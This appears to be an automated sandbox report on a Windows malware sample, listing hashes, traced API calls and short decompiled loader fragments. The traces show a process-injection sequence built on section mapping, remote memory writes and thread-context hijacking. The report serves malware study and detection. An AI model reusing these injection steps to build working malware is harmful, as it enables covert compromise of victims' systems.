  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				/* Entry point: records the module base, creates a private growable heap
				   (initial size 0x10000) and runs E00401639, which starts the worker threads
				   listed under APIs below. The thread exits with E00401639's result, or with
				   GetLastError() if the heap could not be created. */
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed; base address of this module
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:F3C6625D8EDE3FE6C8C4023337D761AC
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:66739
Initial sample SHA 256:A93182CDCDE8030CAC64378DA0406C7F628486EC1CF41B6E49CF5A551C0AB837
Initial sample name:03290.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
